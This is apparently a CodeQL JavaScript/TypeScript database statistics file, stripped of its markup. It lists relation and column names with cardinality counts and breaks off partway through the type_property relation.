-652 - - - - - - -idx -parent - - -12 - - -1 -2 -4092 - - -2 -3 -1365 - - -3 -4 -1995 - - -4 -5 -283 - - -5 -6 -1681 - - -6 -7 -5909 - - -7 -10 -1344 - - -10 -3049605 -1029 - - - - - - -idx -tostring - - -12 - - -1 -2 -4093 - - -2 -3 -1365 - - -3 -4 -2014 - - -4 -5 -1147 - - -5 -6 -1529 - - -6 -7 -5401 - - -7 -10 -1499 - - -10 -573348 -650 - - - - - - -tostring -id - - -12 - - -1 -2 -466570 - - -2 -3 -157949 - - -3 -4 -55443 - - -4 -6 -61411 - - -6 -17 -63412 - - -17 -128652 -29706 - - - - - - -tostring -kind - - -12 - - -1 -2 -772624 - - -2 -24 -61867 - - - - - - -tostring -parent - - -12 - - -1 -2 -467110 - - -2 -3 -158201 - - -3 -4 -55446 - - -4 -6 -61061 - - -6 -17 -63168 - - -17 -128642 -29505 - - - - - - -tostring -idx - - -12 - - -1 -2 -724438 - - -2 -3 -86524 - - -3 -7765 -23529 - - - - - - - - -literals -expr -3145090 - - -value -216517 - - -raw -234110 - - -expr -3145090 - - - - -value -raw - - -12 - - -1 -2 -201221 - - -2 -25 -15296 - - - - - - -value -expr - - -12 - - -1 -2 -95821 - - -2 -3 -41222 - - -3 -4 -19627 - - -4 -5 -16097 - - -5 -9 -18825 - - -9 -31 -16474 - - -31 -122435 -8451 - - - - - - -raw -value - - -12 - - -1 -2 -234110 - - - - - - -raw -expr - - -12 - - -1 -2 -104635 - - -2 -3 -47230 - - -3 -4 -20082 - - -4 -5 -16835 - - -5 -9 -19610 - - -9 -34 -17695 - - -34 -120241 -8023 - - - - - - -expr -value - - -12 - - -1 -2 -3145090 - - - - - - -expr -raw - - -12 - - -1 -2 -3145090 - - - - - - - - -enclosing_stmt -5372899 - - -expr -5372899 - - -stmt -854574 - - - - -expr -stmt - - -12 - - -1 -2 -5372899 - - - - - - -stmt -expr - - -12 - - -1 -3 -74578 - - -3 -4 -254844 - - -4 -5 -57228 - - -5 -6 -136234 - - -6 -7 -44557 - - -7 -8 -79401 - - -8 -9 -55420 - - -9 -11 -63155 - - -11 -17 -65146 - - -17 -88321 -24011 - - - - - - - - -expr_containers -5495305 - - -expr -5495305 - - -container -118511 - - - - -expr -container - - -12 - - -1 -2 -5495305 - - - - - - -container -expr - - -12 - - -1 -4 -7197 - - -4 -6 -9110 - - -6 -8 -9222 - - -8 -10 -8424 
- - -10 -13 -10651 - - -13 -16 -8706 - - -16 -20 -9358 - - -20 -25 -9955 - - -25 -31 -8893 - - -31 -40 -9356 - - -40 -54 -9017 - - -54 -85 -8935 - - -85 -484 -8890 - - -484 -459128 -797 - - - - - - - - -array_size -28188 - - -ae -28188 - - -sz -118 - - - - -ae -sz - - -12 - - -1 -2 -28188 - - - - - - -sz -ae - - -12 - - -1 -2 -52 - - -2 -3 -21 - - -3 -5 -9 - - -5 -8 -9 - - -9 -20 -9 - - -22 -181 -9 - - -231 -12345 -9 - - - - - - - - -is_delegating -4 - - -yield -4 - - - - - -expr_contains_template_tag_location -31 - - -expr -31 - - -location -31 - - - - -expr -location - - -12 - - -1 -2 -31 - - - - - - -location -expr - - -12 - - -1 -2 -31 - - - - - - - - -template_placeholder_tag_info -283 - - -node -283 - - -parentNode -92 - - -raw -24 - - - - -node -parentNode - - -12 - - -1 -2 -283 - - - - - - -node -raw - - -12 - - -1 -2 -283 - - - - - - -parentNode -node - - -12 - - -1 -2 -49 - - -2 -3 -4 - - -3 -4 -9 - - -5 -6 -9 - - -6 -7 -4 - - -7 -8 -13 - - -9 -11 -4 - - - - - - -parentNode -raw - - -12 - - -1 -2 -49 - - -2 -3 -4 - - -3 -4 -9 - - -4 -5 -11 - - -5 -6 -13 - - -6 -11 -6 - - - - - - -raw -node - - -12 - - -1 -2 -2 - - -2 -3 -4 - - -3 -4 -9 - - -4 -6 -2 - - -16 -17 -2 - - -20 -26 -2 - - -34 -45 -2 - - -82 -83 -1 - - - - - - -raw -parentNode - - -12 - - -1 -2 -2 - - -2 -3 -4 - - -3 -4 -9 - - -4 -6 -2 - - -16 -17 -2 - - -20 -26 -2 - - -34 -41 -2 - - -44 -45 -1 - - - - - - - - -scopes -id -118172 - - -id -118172 - - -kind -8 - - - - -id -kind - - -12 - - -1 -2 -118172 - - - - - - -kind -id - - -12 - - -1 -2 -1 - - -4 -5 -1 - - -17 -18 -1 - - -21 -22 -1 - - -28 -29 -1 - - -584 -585 -1 - - -1272 -1273 -1 - - -116245 -116246 -1 - - - - - - - - -scopenodes -118171 - - -node -118171 - - -scope -118171 - - - - -node -scope - - -12 - - -1 -2 -118171 - - - - - - -scope -node - - -12 - - -1 -2 -118171 - - - - - - - - -scopenesting -118171 - - -inner -118171 - - -outer -33143 - - - - -inner -outer - - -12 - - -1 -2 -118171 - - - - - - -outer -inner - - -12 - - -1 -2 -17868 
- - -2 -3 -6196 - - -3 -4 -2666 - - -4 -6 -2791 - - -6 -13 -2584 - - -13 -17277 -1038 - - - - - - - - -is_generator -62 - - -fun -62 - - - - - -has_rest_parameter -33 - - -fun -33 - - - - - -is_async -50 - - -fun -50 - - - - - -variables -id -364388 - - -id -364388 - - -name -56559 - - -scope -118168 - - - - -id -name - - -12 - - -1 -2 -364388 - - - - - - -id -scope - - -12 - - -1 -2 -364388 - - - - - - -name -id - - -12 - - -1 -2 -38013 - - -2 -3 -9547 - - -3 -5 -4518 - - -5 -115 -4242 - - -115 -116259 -239 - - - - - - -name -scope - - -12 - - -1 -2 -38013 - - -2 -3 -9547 - - -3 -5 -4518 - - -5 -115 -4242 - - -115 -116259 -239 - - - - - - -scope -id - - -12 - - -1 -2 -39907 - - -2 -3 -32053 - - -3 -4 -18882 - - -4 -5 -9814 - - -5 -8 -10909 - - -8 -8779 -6603 - - - - - - -scope -name - - -12 - - -1 -2 -39907 - - -2 -3 -32053 - - -3 -4 -18882 - - -4 -5 -9814 - - -5 -8 -10909 - - -8 -8779 -6603 - - - - - - - - -local_type_names -23565 - - -id -23565 - - -name -6080 - - -scope -1614 - - - - -id -name - - -12 - - -1 -2 -23565 - - - - - - -id -scope - - -12 - - -1 -2 -23565 - - - - - - -name -id - - -12 - - -1 -2 -2821 - - -2 -3 -1362 - - -3 -4 -641 - - -4 -6 -508 - - -6 -13 -485 - - -13 -533 -263 - - - - - - -name -scope - - -12 - - -1 -2 -2821 - - -2 -3 -1362 - - -3 -4 -641 - - -4 -6 -508 - - -6 -13 -485 - - -13 -533 -263 - - - - - - -scope -id - - -12 - - -1 -2 -138 - - -2 -3 -109 - - -3 -4 -116 - - -4 -5 -108 - - -5 -7 -140 - - -7 -8 -89 - - -8 -10 -131 - - -10 -12 -112 - - -12 -15 -144 - - -15 -19 -134 - - -19 -25 -132 - - -25 -37 -122 - - -37 -87 -122 - - -87 -221 -17 - - - - - - -scope -name - - -12 - - -1 -2 -138 - - -2 -3 -109 - - -3 -4 -116 - - -4 -5 -108 - - -5 -7 -140 - - -7 -8 -89 - - -8 -10 -131 - - -10 -12 -112 - - -12 -15 -144 - - -15 -19 -134 - - -19 -25 -132 - - -25 -37 -122 - - -37 -87 -122 - - -87 -221 -17 - - - - - - - - -local_namespace_names -20832 - - -id -20832 - - -name -4078 - - -scope -1543 - - - - -id -name - - -12 - - -1 -2 -20832 - - - - - 
- -id -scope - - -12 - - -1 -2 -20832 - - - - - - -name -id - - -12 - - -1 -2 -1787 - - -2 -3 -859 - - -3 -4 -378 - - -4 -5 -216 - - -5 -8 -364 - - -8 -20 -310 - - -20 -533 -164 - - - - - - -name -scope - - -12 - - -1 -2 -1787 - - -2 -3 -859 - - -3 -4 -378 - - -4 -5 -216 - - -5 -8 -364 - - -8 -20 -310 - - -20 -533 -164 - - - - - - -scope -id - - -12 - - -1 -2 -88 - - -2 -3 -123 - - -3 -4 -120 - - -4 -5 -104 - - -5 -6 -107 - - -6 -7 -70 - - -7 -8 -87 - - -8 -10 -137 - - -10 -12 -122 - - -12 -15 -122 - - -15 -19 -124 - - -19 -26 -120 - - -26 -39 -117 - - -39 -136 -102 - - - - - - -scope -name - - -12 - - -1 -2 -88 - - -2 -3 -123 - - -3 -4 -120 - - -4 -5 -104 - - -5 -6 -107 - - -6 -7 -70 - - -7 -8 -87 - - -8 -10 -137 - - -10 -12 -122 - - -12 -15 -122 - - -15 -19 -124 - - -19 -26 -120 - - -26 -39 -117 - - -39 -136 -102 - - - - - - - - -is_arguments_object -116243 - - -id -116243 - - - - - -bind -1295408 - - -id -1295408 - - -decl -224900 - - - - -id -decl - - -12 - - -1 -2 -1295408 - - - - - - -decl -id - - -12 - - -1 -2 -81789 - - -2 -3 -50824 - - -3 -4 -29919 - - -4 -5 -17755 - - -5 -7 -16901 - - -7 -14 -17790 - - -14 -98305 -9922 - - - - - - - - -decl -250257 - - -id -250257 - - -decl -246998 - - - - -id -decl - - -12 - - -1 -2 -250257 - - - - - - -decl -id - - -12 - - -1 -2 -245772 - - -2 -283 -1226 - - - - - - - - -typebind -36216 - - -id -36216 - - -decl -12650 - - - - -id -decl - - -12 - - -1 -2 -36216 - - - - - - -decl -id - - -12 - - -1 -2 -6781 - - -2 -3 -2435 - - -3 -4 -1133 - - -4 -6 -1127 - - -6 -17 -954 - - -17 -524 -220 - - - - - - - - -typedecl -23573 - - -id -23573 - - -decl -23565 - - - - -id -decl - - -12 - - -1 -2 -23573 - - - - - - -decl -id - - -12 - - -1 -2 -23558 - - -2 -4 -7 - - - - - - - - -namespacedecl -20839 - - -id -20839 - - -decl -20832 - - - - -id -decl - - -12 - - -1 -2 -20839 - - - - - - -decl -id - - -12 - - -1 -2 -20828 - - -2 -5 -4 - - - - - - - - -namespacebind -4300 - - -id -4300 - - -decl -485 - - - - -id -decl - - -12 - - -1 -2 
-4300 - - - - - - -decl -id - - -12 - - -1 -2 -133 - - -2 -3 -46 - - -3 -4 -56 - - -4 -5 -30 - - -5 -7 -37 - - -7 -9 -44 - - -9 -12 -41 - - -12 -17 -38 - - -17 -31 -37 - - -32 -287 -23 - - - - - - - - -properties -id -142723 - - -id -142723 - - -parent -45129 - - -index -4204 - - -kind -3 - - -tostring -67703 - - - - -id -parent - - -12 - - -1 -2 -142723 - - - - - - -id -index - - -12 - - -1 -2 -142723 - - - - - - -id -kind - - -12 - - -1 -2 -142723 - - - - - - -id -tostring - - -12 - - -1 -2 -142723 - - - - - - -parent -id - - -12 - - -1 -2 -15702 - - -2 -3 -17715 - - -3 -4 -4729 - - -4 -6 -3778 - - -6 -4205 -3205 - - - - - - -parent -index - - -12 - - -1 -2 -15702 - - -2 -3 -17715 - - -3 -4 -4729 - - -4 -6 -3778 - - -6 -4205 -3205 - - - - - - -parent -kind - - -12 - - -1 -2 -44603 - - -2 -4 -526 - - - - - - -parent -tostring - - -12 - - -1 -2 -15770 - - -2 -3 -17763 - - -3 -4 -4692 - - -4 -6 -3759 - - -6 -4173 -3145 - - - - - - -index -id - - -12 - - -2 -3 -2827 - - -3 -4 -364 - - -4 -6 -358 - - -6 -8 -337 - - -8 -11713 -316 - - -29427 -45130 -2 - - - - - - -index -parent - - -12 - - -2 -3 -2827 - - -3 -4 -364 - - -4 -6 -358 - - -6 -8 -337 - - -8 -11713 -316 - - -29427 -45130 -2 - - - - - - -index -kind - - -12 - - -1 -2 -4149 - - -2 -4 -55 - - - - - - -index -tostring - - -12 - - -1 -2 -2827 - - -2 -3 -364 - - -3 -5 -358 - - -5 -7 -337 - - -7 -6233 -316 - - -16744 -16747 -2 - - - - - - -kind -id - - -12 - - -338 -339 -1 - - -1529 -1530 -1 - - -140856 -140857 -1 - - - - - - -kind -parent - - -12 - - -204 -205 -1 - - -523 -524 -1 - - -45034 -45035 -1 - - - - - - -kind -index - - -12 - - -36 -37 -1 - - -55 -56 -1 - - -4204 -4205 -1 - - - - - - -kind -tostring - - -12 - - -174 -175 -1 - - -880 -881 -1 - - -66649 -66650 -1 - - - - - - -tostring -id - - -12 - - -1 -2 -46301 - - -2 -3 -13295 - - -3 -6 -5112 - - -6 -2975 -2995 - - - - - - -tostring -parent - - -12 - - -1 -2 -46926 - - -2 -3 -13013 - - -3 -7 -5466 - - -7 -2975 -2298 - - - - - - -tostring -index - - -12 - 
- -1 -2 -61480 - - -2 -4 -5275 - - -4 -43 -948 - - - - - - -tostring -kind - - -12 - - -1 -2 -67703 - - - - - - - - -is_computed -27 - - -id -27 - - - - - -is_method -392 - - -id -392 - - - - - -is_static -36 - - -id -36 - - - - - -type_alias -1386 - - -aliasType -1386 - - -underlyingType -1361 - - - - -underlyingType -aliasType - - -12 - - -1 -2 -1 - - - - - - -aliasType -underlyingType - - -12 - - -1 -2 -1 - - - - - - - - -type_literal_value -31882 - - -typ -31882 - - -value -31828 - - - - -typ -value - - -12 - - -1 -2 -31882 - - - - - - -value -typ - - -12 - - -1 -2 -31774 - - -2 -3 -54 - - - - - - - - -signature_types -46921 - - -id -46921 - - -kind -2 - - -tostring -27460 - - -type_parameters -11 - - -required_params -22 - - - - -id -kind - - -12 - - -1 -2 -46921 - - - - - - -id -tostring - - -12 - - -1 -2 -46921 - - - - - - -id -type_parameters - - -12 - - -1 -2 -46921 - - - - - - -id -required_params - - -12 - - -1 -2 -46921 - - - - - - -kind -id - - -12 - - -2639 -2640 -1 - - -44282 -44283 -1 - - - - - - -kind -tostring - - -12 - - -2200 -2201 -1 - - -25260 -25261 -1 - - - - - - -kind -type_parameters - - -12 - - -4 -5 -1 - - -11 -12 -1 - - - - - - -kind -required_params - - -12 - - -18 -19 -1 - - -19 -20 -1 - - - - - - -tostring -id - - -12 - - -1 -2 -22069 - - -2 -3 -3061 - - -3 -13 -2112 - - -13 -277 -218 - - - - - - -tostring -kind - - -12 - - -1 -2 -27460 - - - - - - -tostring -type_parameters - - -12 - - -1 -2 -27459 - - -2 -3 -1 - - - - - - -tostring -required_params - - -12 - - -1 -2 -27134 - - -2 -10 -326 - - - - - - -type_parameters -id - - -12 - - -1 -2 -1 - - -13 -14 -1 - - -25 -26 -1 - - -34 -35 -1 - - -42 -43 -1 - - -51 -52 -1 - - -74 -75 -1 - - -139 -140 -1 - - -274 -275 -1 - - -5367 -5368 -1 - - -40901 -40902 -1 - - - - - - -type_parameters -kind - - -12 - - -1 -2 -7 - - -2 -3 -4 - - - - - - -type_parameters -tostring - - -12 - - -1 -2 -1 - - -5 -6 -1 - - -6 -7 -2 - - -8 -9 -2 - - -17 -18 -1 - - -18 -19 -1 - - -158 -159 -1 - - -1805 -1806 -1 
- - -25429 -25430 -1 - - - - - - -type_parameters -required_params - - -12 - - -1 -2 -1 - - -3 -4 -1 - - -4 -5 -1 - - -5 -6 -1 - - -6 -7 -2 - - -7 -8 -1 - - -8 -9 -2 - - -9 -10 -1 - - -22 -23 -1 - - - - - - -required_params -id - - -12 - - -1 -2 -4 - - -2 -3 -2 - - -3 -5 -2 - - -5 -11 -2 - - -11 -12 -2 - - -44 -131 -2 - - -197 -373 -2 - - -645 -2439 -2 - - -2783 -6853 -2 - - -16407 -17002 -2 - - - - - - -required_params -kind - - -12 - - -1 -2 -7 - - -2 -3 -15 - - - - - - -required_params -tostring - - -12 - - -1 -2 -4 - - -2 -3 -3 - - -4 -5 -1 - - -5 -6 -2 - - -9 -12 -2 - - -39 -62 -2 - - -112 -205 -2 - - -432 -1404 -2 - - -1813 -3662 -2 - - -8431 -11659 -2 - - - - - - -required_params -type_parameters - - -12 - - -1 -2 -12 - - -2 -3 -1 - - -3 -4 -2 - - -5 -7 -2 - - -8 -10 -2 - - -10 -11 -2 - - -11 -12 -1 - - - - - - - - -is_abstract_signature -12 - - -sig -12 - - - - - -signature_rest_parameter -19521 - - -sig -19521 - - -rest_param_arra_type -14259 - - - - -rest_param_arra_type -sig - - -12 - - -1 -2 -1 - - - - - - -sig -rest_param_arra_type - - -12 - - -1 -2 -1 - - - - - - - - -type_contains_signature -87640 - - -typ -68964 - - -kind -2 - - -index -247 - - -sig -37344 - - - - -typ -kind - - -12 - - -1 -2 -68938 - - -2 -3 -26 - - - - - - -typ -index - - -12 - - -1 -2 -59150 - - -2 -3 -5394 - - -3 -248 -4420 - - - - - - -typ -sig - - -12 - - -1 -2 -60034 - - -2 -3 -4557 - - -3 -248 -4373 - - - - - - -kind -typ - - -12 - - -2582 -2583 -1 - - -66408 -66409 -1 - - - - - - -kind -index - - -12 - - -6 -7 -1 - - -247 -248 -1 - - - - - - -kind -sig - - -12 - - -2646 -2647 -1 - - -34698 -34699 -1 - - - - - - -index -typ - - -12 - - -1 -2 -198 - - -2 -3 -21 - - -3 -265 -19 - - -449 -42171 -9 - - - - - - -index -kind - - -12 - - -1 -2 -241 - - -2 -3 -6 - - - - - - -index -sig - - -12 - - -1 -2 -198 - - -2 -3 -24 - - -3 -90 -19 - - -309 -31688 -6 - - - - - - -sig -typ - - -12 - - -1 -2 -35114 - - -2 -896 -2230 - - - - - - -sig -kind - - -12 - - -1 -2 -37344 - - - - - - -sig 
-index - - -12 - - -1 -2 -36489 - - -2 -9 -855 - - - - - - - - -signature_contains_type -107012 - - -child -26824 - - -parent -37344 - - -index -21 - - - - -child -parent - - -12 - - -1 -2 -19848 - - -2 -3 -3736 - - -3 -7 -2017 - - -7 -10275 -1223 - - - - - - -child -index - - -12 - - -1 -2 -22572 - - -2 -3 -3289 - - -3 -22 -963 - - - - - - -parent -child - - -12 - - -1 -2 -3594 - - -2 -3 -18463 - - -3 -4 -10057 - - -4 -5 -3906 - - -5 -11 -1324 - - - - - - -parent -index - - -12 - - -1 -2 -2649 - - -2 -3 -14810 - - -3 -4 -12007 - - -4 -5 -4294 - - -5 -8 -3055 - - -8 -22 -529 - - - - - - -index -child - - -12 - - -1 -2 -2 - - -2 -3 -6 - - -3 -4 -1 - - -5 -6 -1 - - -9 -10 -1 - - -18 -19 -1 - - -106 -107 -1 - - -313 -314 -1 - - -455 -456 -1 - - -643 -644 -1 - - -1088 -1089 -1 - - -2051 -2052 -1 - - -6862 -6863 -1 - - -8789 -8790 -1 - - -12289 -12290 -1 - - - - - - -index -parent - - -12 - - -2 -3 -1 - - -3 -4 -1 - - -4 -5 -2 - - -5 -6 -1 - - -6 -7 -1 - - -17 -18 -1 - - -22 -23 -1 - - -26 -27 -1 - - -37 -38 -1 - - -45 -46 -1 - - -91 -92 -1 - - -219 -220 -1 - - -529 -530 -1 - - -1042 -1043 -1 - - -1574 -1575 -1 - - -3584 -3585 -1 - - -7878 -7879 -1 - - -19885 -19886 -1 - - -34695 -34696 -1 - - -37344 -37345 -1 - - - - - - - - -signature_parameter_name -69668 - - -sig -34695 - - -index -20 - - -name -4071 - - - - -sig -index - - -12 - - -1 -2 -14810 - - -2 -3 -12007 - - -3 -4 -4294 - - -4 -7 -3055 - - -7 -21 -529 - - - - - - -sig -name - - -12 - - -1 -2 -14810 - - -2 -3 -12007 - - -3 -4 -4294 - - -4 -7 -3055 - - -7 -21 -529 - - - - - - -index -sig - - -12 - - -2 -3 -1 - - -3 -4 -1 - - -4 -5 -2 - - -5 -6 -1 - - -6 -7 -1 - - -17 -18 -1 - - -22 -23 -1 - - -26 -27 -1 - - -37 -38 -1 - - -45 -46 -1 - - -91 -92 -1 - - -219 -220 -1 - - -529 -530 -1 - - -1042 -1043 -1 - - -1574 -1575 -1 - - -3584 -3585 -1 - - -7878 -7879 -1 - - -19885 -19886 -1 - - -34695 -34696 -1 - - - - - - -index -name - - -12 - - -2 -3 -1 - - -3 -4 -1 - - -4 -5 -2 - - -5 -6 -2 - - -11 -12 -1 - - -16 -17 -1 - 
- -18 -19 -1 - - -24 -25 -1 - - -30 -31 -1 - - -45 -46 -1 - - -63 -64 -1 - - -116 -117 -1 - - -188 -189 -1 - - -344 -345 -1 - - -605 -606 -1 - - -1092 -1093 -1 - - -1741 -1742 -1 - - -2122 -2123 -1 - - - - - - -name -sig - - -12 - - -1 -2 -1898 - - -2 -3 -700 - - -3 -4 -294 - - -4 -5 -262 - - -5 -8 -310 - - -8 -24 -309 - - -24 -3588 -298 - - - - - - -name -index - - -12 - - -1 -2 -2804 - - -2 -3 -738 - - -3 -4 -290 - - -4 -15 -239 - - - - - - - - -number_index_type -2038 - - -baseType -2038 - - -propertyType -517 - - - - -baseType -propertyType - - -12 - - -1 -2 -2038 - - - - - - -propertyType -baseType - - -12 - - -1 -2 -435 - - -2 -3 -70 - - -3 -1259 -12 - - - - - - - - -string_index_type -1102 - - -baseType -1102 - - -propertyType -256 - - - - -baseType -propertyType - - -12 - - -1 -2 -1102 - - - - - - -propertyType -baseType - - -12 - - -1 -2 -219 - - -2 -3 -20 - - -3 -436 -17 - - - - - - - - -base_type_names -941 - - -typeName -928 - - -baseTypeName -369 - - - - -typeName -baseTypeName - - -12 - - -1 -2 -917 - - -2 -4 -11 - - - - - - -baseTypeName -typeName - - -12 - - -1 -2 -175 - - -2 -3 -101 - - -3 -4 -29 - - -4 -5 -29 - - -5 -11 -28 - - -15 -41 -7 - - - - - - - - -self_types -19632 - - -typeName -14119 - - -selfType -19632 - - - - -typeName -selfType - - -12 - - -1 -2 -10451 - - -2 -3 -1823 - - -3 -4 -1845 - - - - - - -selfType -typeName - - -12 - - -1 -2 -19632 - - - - - - - - -tuple_type_min_length -241 - - -typ -241 - - -minLength -10 - - - - -typ -minLength - - -12 - - -1 -2 -241 - - - - - - -minLength -typ - - -12 - - -2 -3 -3 - - -3 -4 -1 - - -4 -5 -1 - - -7 -8 -1 - - -20 -21 -1 - - -42 -43 -1 - - -66 -67 -1 - - -93 -94 -1 - - - - - - - - -tuple_type_rest_index -6 - - -typ -6 - - -index -2 - - - - -typ -index - - -12 - - -1 -2 -6 - - - - - - -index -typ - - -12 - - -1 -2 -1 - - -5 -6 -1 - - - - - - - - -comments -id -104947 - - -id -104947 - - -kind -5 - - -toplevel -4497 - - -text -73454 - - -tostring -57955 - - - - -id -kind - - -12 - - -1 -2 
-104947 - - - - - - -id -toplevel - - -12 - - -1 -2 -104947 - - - - - - -id -text - - -12 - - -1 -2 -104947 - - - - - - -id -tostring - - -12 - - -1 -2 -104947 - - - - - - -kind -id - - -12 - - -1 -2 -2 - - -8834 -8835 -1 - - -19270 -19271 -1 - - -76841 -76842 -1 - - - - - - -kind -toplevel - - -12 - - -1 -2 -2 - - -1705 -1706 -1 - - -3107 -3108 -1 - - -3141 -3142 -1 - - - - - - -kind -text - - -12 - - -1 -2 -2 - - -4893 -4894 -1 - - -12759 -12760 -1 - - -55810 -55811 -1 - - - - - - -kind -tostring - - -12 - - -1 -2 -2 - - -1739 -1740 -1 - - -2536 -2537 -1 - - -53678 -53679 -1 - - - - - - -toplevel -id - - -12 - - -1 -2 -1034 - - -2 -3 -512 - - -3 -4 -332 - - -4 -5 -260 - - -5 -7 -388 - - -7 -10 -401 - - -10 -14 -354 - - -14 -21 -365 - - -21 -36 -338 - - -36 -99 -339 - - -99 -6350 -174 - - - - - - -toplevel -kind - - -12 - - -1 -2 -1856 - - -2 -3 -1824 - - -3 -4 -817 - - - - - - -toplevel -text - - -12 - - -1 -2 -1043 - - -2 -3 -533 - - -3 -4 -341 - - -4 -5 -266 - - -5 -7 -396 - - -7 -9 -315 - - -9 -13 -388 - - -13 -20 -385 - - -20 -35 -344 - - -35 -103 -344 - - -103 -4413 -142 - - - - - - -toplevel -tostring - - -12 - - -1 -2 -1054 - - -2 -3 -571 - - -3 -4 -374 - - -4 -5 -297 - - -5 -6 -232 - - -6 -8 -363 - - -8 -11 -345 - - -11 -16 -366 - - -16 -27 -352 - - -27 -60 -338 - - -60 -4394 -205 - - - - - - -text -id - - -12 - - -1 -2 -59626 - - -2 -3 -10314 - - -3 -1417 -3514 - - - - - - -text -kind - - -12 - - -1 -2 -73446 - - -2 -5 -8 - - - - - - -text -toplevel - - -12 - - -1 -2 -62696 - - -2 -3 -8455 - - -3 -257 -2303 - - - - - - -text -tostring - - -12 - - -1 -2 -73446 - - -2 -5 -8 - - - - - - -tostring -id - - -12 - - -1 -2 -44781 - - -2 -3 -9203 - - -3 -4589 -3971 - - - - - - -tostring -kind - - -12 - - -1 -2 -57955 - - - - - - -tostring -toplevel - - -12 - - -1 -2 -48252 - - -2 -3 -7233 - - -3 -513 -2470 - - - - - - -tostring -text - - -12 - - -1 -2 -55262 - - -2 -3403 -2693 - - - - - - - - -types -179398 - - -id -179398 - - -kind -9 - - -tostring -40918 - - - 
- -id -kind - - -12 - - -1 -2 -179398 - - - - - - -id -tostring - - -12 - - -1 -2 -179398 - - - - - - -kind -id - - -12 - - -1 -2 -5 - - -1802 -1803 -1 - - -6109 -6110 -1 - - -12383 -12384 -1 - - -159099 -159100 -1 - - - - - - -kind -tostring - - -12 - - -1 -2 -5 - - -50 -51 -1 - - -745 -746 -1 - - -7464 -7465 -1 - - -32936 -32937 -1 - - - - - - -tostring -id - - -12 - - -1 -2 -22482 - - -2 -3 -8025 - - -3 -4 -3362 - - -4 -7 -3387 - - -7 -33 -3070 - - -33 -7284 -592 - - - - - - -tostring -kind - - -12 - - -1 -2 -40638 - - -2 -4 -280 - - - - - - - - -type_child -17410 - - -child -9118 - - -parent -7772 - - -idx -296 - - - - -child -parent - - -12 - - -1 -2 -7113 - - -2 -3 -978 - - -3 -8 -686 - - -8 -199 -341 - - - - - - -child -idx - - -12 - - -1 -2 -8255 - - -2 -5 -726 - - -5 -19 -137 - - - - - - -parent -child - - -12 - - -1 -2 -5433 - - -2 -3 -1746 - - -3 -288 -583 - - -288 -297 -10 - - - - - - -parent -idx - - -12 - - -1 -2 -5422 - - -2 -3 -1757 - - -3 -288 -583 - - -288 -297 -10 - - - - - - -idx -child - - -12 - - -1 -2 -1 - - -2 -3 -39 - - -3 -4 -3 - - -4 -5 -61 - - -5 -6 -37 - - -6 -7 -56 - - -7 -12 -22 - - -12 -14 -18 - - -14 -15 -44 - - -17 -6068 -15 - - - - - - -idx -parent - - -12 - - -2 -15 -13 - - -15 -16 -90 - - -19 -20 -81 - - -20 -23 -3 - - -23 -24 -75 - - -24 -55 -23 - - -55 -7773 -11 - - - - - - - - -ast_node_type -1261889 - - -node -1261889 - - -typ -72602 - - - - -node -typ - - -12 - - -1 -2 -1261889 - - - - - - -typ -node - - -12 - - -1 -2 -39248 - - -2 -3 -8371 - - -3 -4 -7888 - - -4 -5 -3053 - - -5 -8 -6417 - - -8 -28 -5528 - - -28 -588233 -2097 - - - - - - - - -declared_function_signature -62664 - - -node -62664 - - -sig -21731 - - - - -node -sig - - -12 - - -1 -2 -62664 - - - - - - -sig -node - - -12 - - -1 -2 -16826 - - -2 -3 -2358 - - -3 -6 -1683 - - -6 -10251 -864 - - - - - - - - -invoke_expr_signature -140668 - - -node -140668 - - -sig -9111 - - - - -node -sig - - -12 - - -1 -2 -140668 - - - - - - -sig -node - - -12 - - -1 -2 -4612 - - 
-2 -3 -1819 - - -3 -4 -737 - - -4 -6 -696 - - -6 -14 -705 - - -14 -68351 -542 - - - - - - - - -invoke_expr_overload_index -73550 - - -node -73550 - - -index -47 - - - - -node -index - - -12 - - -1 -2 -73550 - - - - - - -index -node - - -12 - - -1 -2 -17 - - -2 -3 -7 - - -3 -5 -4 - - -5 -6 -4 - - -6 -8 -3 - - -8 -16 -4 - - -27 -155 -4 - - -211 -68535 -4 - - - - - - - - -symbols -10192 - - -id -10192 - - -kind -3 - - -name -7872 - - - - -id -kind - - -12 - - -1 -2 -10192 - - - - - - -id -name - - -12 - - -1 -2 -10192 - - - - - - -kind -id - - -12 - - -584 -585 -1 - - -2385 -2386 -1 - - -7223 -7224 -1 - - - - - - -kind -name - - -12 - - -30 -31 -1 - - -2385 -2386 -1 - - -5609 -5610 -1 - - - - - - -name -id - - -12 - - -1 -2 -6929 - - -2 -3 -533 - - -3 -273 -410 - - - - - - -name -kind - - -12 - - -1 -2 -7730 - - -2 -4 -142 - - - - - - - - -symbol_parent -7807 - - -symbol -7807 - - -parent -1727 - - - - -symbol -parent - - -12 - - -1 -2 -7807 - - - - - - -parent -symbol - - -12 - - -1 -2 -778 - - -2 -3 -304 - - -3 -4 -212 - - -4 -5 -111 - - -5 -8 -152 - - -8 -26 -136 - - -26 -297 -34 - - - - - - - - -symbol_module -100 - - -symbol -97 - - -moduleName -98 - - - - -symbol -moduleName - - -12 - - -1 -2 -95 - - -2 -4 -2 - - - - - - -moduleName -symbol - - -12 - - -1 -2 -96 - - -2 -3 -2 - - - - - - - - -symbol_global -354 - - -symbol -354 - - -globalName -350 - - - - -symbol -globalName - - -12 - - -1 -2 -354 - - - - - - -globalName -symbol - - -12 - - -1 -2 -347 - - -2 -4 -3 - - - - - - - - -ast_node_symbol -8173 - - -node -8173 - - -symbol -8155 - - - - -node -symbol - - -12 - - -1 -2 -8173 - - - - - - -symbol -node - - -12 - - -1 -2 -8147 - - -2 -12 -8 - - - - - - - - -type_symbol -12383 - - -typ -12383 - - -symbol -6743 - - - - -typ -symbol - - -12 - - -1 -2 -12383 - - - - - - -symbol -typ - - -12 - - -1 -2 -6240 - - -2 -3070 -503 - - - - - - - - -type_property -331170 - - -typ -49305 - - -name -22420 - - -propertyType -130857 - - - - -typ -name - - -12 - - -1 -2 -10275 
